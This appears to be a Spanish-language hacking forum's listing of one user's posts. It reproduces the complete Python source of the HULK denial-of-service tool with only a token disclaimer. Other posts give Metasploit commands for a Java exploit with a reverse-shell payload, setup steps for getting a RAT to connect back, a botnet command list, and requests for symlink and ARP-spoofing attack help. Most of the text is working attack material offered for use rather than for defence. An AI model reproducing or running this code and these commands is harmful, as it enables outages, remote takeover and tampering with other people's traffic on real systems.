Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Acidkode

#1

La mayoría de las herramientas DoS comparten un problema... crean patrones repetibles, demasiado fáciles de predecir y, por lo tanto, permiten mitigar sus efectos.

HULK (Http Unbearable Load King) es una sencilla herramienta DoS escrita en Python cuyo principal objetivo es generar peticiones únicas para evitar/evadir motores de caché e incidir directamente en la carga del servidor. Las principales técnicas que utiliza son las siguientes:

- Ofuscación del origen: cada petición del cliente se envía con un agente de usuario distinto seleccionado aleatoriamente de una lista.

- Falsificación de referencias: el referer que incluye la petición está ofuscado y apunta hacia el mismo servidor objetivo u otros sitios web conocidos.

- Adhesión: utiliza comandos estándar HTTP para tratar de hacer que el servidor mantenga las conexiones abiertas mediante el uso de Keep-Alive con una ventana de tiempo variable.

- no-cache: se solicita al servidor HTTP no-cache para obtener una página única.

- Transformación de URL única: para evitar la caché y otras herramientas de optimización, se utilizan nombres de parámetros y valores aleatoriamente en cada petición, lo que hace que cada petición sea única y que el servidor tenga que procesarla en cada caso.

Resultados

El autor Barry Shteiman comenta que ha realizado pruebas contra un servidor web con 4GB de RAM y Microsoft IIS7 y fue capaz de tirarlo en menos de un minuto, lanzando todas las peticiones desde un único host.

En las siguientes imágenes se puede ver la herramienta en acción donde, en la primera (#1), se ejecuta contra una URL y a continuación comienza a generar una carga de solicitudes únicas y las envía hacia el servidor objetivo (host de la URL) y, en segundo lugar (#2), podemos ver que el servidor en algún momento empieza a dejar de responder ya que ha agotado su fondo de recursos.







nota: el parámetro opcional "safe" significa matar el proceso cuando los hilos consigan un error 500.

Código: python
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re

#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0

def inc_counter():
    global request_counter
    request_counter+=1

def set_flag(val):
    global flag
    flag=val

def set_safe():
    global safe
    safe=1
   
# generates a user agent array
def useragent_list():
    global headers_useragents
    headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    return(headers_useragents)

# generates a referer array
def referer_list():
    global headers_referers
    headers_referers.append('http://www.google.com/?q=')
    headers_referers.append('http://www.usatoday.com/search/results?q=')
    headers_referers.append('http://engadget.search.aol.com/search?q=')
    headers_referers.append('http://' + host + '/')
    return(headers_referers)
   
#builds random ascii string
def buildblock(size):
    out_str = ''
    for i in range(0, size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return(out_str)

def usage():
    print '---------------------------------------------------'
    print 'USAGE: python hulk.py '
    print 'you can add "safe" after url, to autoshut after dos'
    print '---------------------------------------------------'

   
#http request
def httpcall(url):
    useragent_list()
    referer_list()
    code=0
    if url.count("?")>0:
        param_joiner="&"
    else:
        param_joiner="?"
    request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
    request.add_header('User-Agent', random.choice(headers_useragents))
    request.add_header('Cache-Control', 'no-cache')
    request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
    request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
    request.add_header('Keep-Alive', random.randint(110,120))
    request.add_header('Connection', 'keep-alive')
    request.add_header('Host',host)
    try:
            urllib2.urlopen(request)
    except urllib2.HTTPError, e:
            #print e.code
            set_flag(1)
            print 'Response Code 500'
            code=500
    except urllib2.URLError, e:
            #print e.reason
            sys.exit()
    else:
            inc_counter()
            urllib2.urlopen(request)
    return(code)       

   
#http caller thread
class HTTPThread(threading.Thread):
    def run(self):
        try:
            while flag<2:
                code=httpcall(url)
                if (code==500) & (safe==1):
                    set_flag(2)
        except Exception, ex:
            pass

# monitors http threads and counts requests
class MonitorThread(threading.Thread):
    def run(self):
        previous=request_counter
        while flag==0:
            if (previous+100request_counter):
                print "%d Requests Sent" % (request_counter)
                previous=request_counter
        if flag==2:
            print "\n-- HULK Attack Finished --"

#execute
if len(sys.argv) < 2:
    usage()
    sys.exit()
else:
    if sys.argv[1]=="help":
        usage()
        sys.exit()
    else:
        print "-- HULK Attack Started --"
        if len(sys.argv)== 3:
            if sys.argv[2]=="safe":
                set_safe()
        url = sys.argv[1]
        if url.count("/")==2:
            url = url + "/"
        m = re.search('http\://([^/]*)/?.*', url)
        host = m.group(1)
        for i in range(500):
            t = HTTPThread()
            t.start()
        t = MonitorThread()
        t.start()


Esta herramienta está pensada para propósitos educativos solamente y no debe ser utilizada para ninguna actividad maliciosa.

Fuentes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
para los que tienen problemas al abrir puertos en tu router aqui una forma mas facil...

1- te registras en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

descargas el programa y esperas a que tengas ip nueva




Al conectarse con proxpn visiten una pagina cualquiera y las va a aparecer un anuncio para que sean premium del proxpn le dan a redireccionar y  luego le dan un refresh al DUC



y tu RAT conecta




aqui un video configurando todos y probando varios RAT


#3


Pareciera ser que Java no ha podido salir del hoyo en el que ha caído después de descubrirse un 0day tras otro, y como si no fuera suficiente nuevamente ha salido a la luz una nueva vulnerabilidad que afecta a Java versiones 7 update 17 y anteriores.

Fue descubierta por Jeroen Frijters que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.

El módulo abusa del Java Reflection generando una Type Confusion, debido a un débil control de acceso al establecer campos finales sobre las clases estáticas, ejecutando así código fuera del Sandbox de Java. Este exploit no bypasea el click-to-play de Java, por lo cual la víctima debe aceptar la advertencia que dice que se puede ejecutar un Applet malicioso en Java.

Aquí les dejo un video con la explotación con Metasploit:




comandos:

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo



fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#4


las veces que he intentado hacer symlink siempre me quedo aqui, con los txt sin acceso y no aparecen en la web (index of) alguna ayuda porfavor
#5



la verdad no lo había visto, pero buen vídeo...

#6



.login

.download No tienes permitido ver los links. Registrarse o Entrar a mi cuenta c:\server.exe

.info

.visit No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

.pslist

.pskill

.run c:\windows\cmd.exe

.restart

.exit

.logout

// usb Spreaded Automatically //






Descargar:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#7
bueno quiero subir una serie pero no se donde ya que sino lo borran, youtube los acepta pero con marcos y no me gusta pero ahi una pagina que tiene varias series y me puse a ver su codigo html pero no encuentro como lo hizo solo se que enlaza el reproductor de youtube.

la pagina es esta (ojo no es para hacer spam) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

alguien que me ayude porfavor   :)  :)  :)
#8
mi idea es tener un asistente como edi en linux es solo eso si alguien conoce alguno o sabe de algun recurso paa programar que me diga porfavor


ejemplo edi:
#9
quiero saber si hay una app para instalar en la pc y testear la red con una aplicación similar a NETWORK SPOOFER, o si me sirve alguna herramienta de backtrack, he buscado algunos comandos de arpspoof pero en ese caso es solo para sacar contraseñas o redireccionar,etc... me gustaria cambiar una imagen cuando carguen una web o cosas asi...
me gustaría tener una herramienta parecida pero en pc escritorio o algo que me pueda ayudar.

si alguien sabe porfavor me diga algo :D


info sobre network spoofer



  • Redireccionar Todo el trafico a una Direccion Especifica (Que todas las paginas te manden a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta )
    Poner Borrosas Todas las Imagenes, Un Simple Filtro de blur que volvera loco a mucha gente
    Cambiar las busquedas de Google, No importa lo que busquen, siempre mostrara la busqueda que especificaste
    Cambiar los Videos en youtube, Como el anterior, TODOS los videos de youtube, sera el video que tu eligas
    Cambiar las Imagenes, Todas las imagenes, saldra la imagen que tu quieras
    Cambiar el Texto de los Sitios, Reemplaza por ejemplo, Todo lo que diga "Amigos" por "enemigos" y facebook se transforma en un lugar mas divertido no?
    Redirigir TODO el trafico por el telefono, Coso Malo para ver cierto tipo de informacion, de ciertas personas... Necesita conocimientos tecnicos, pero es genial!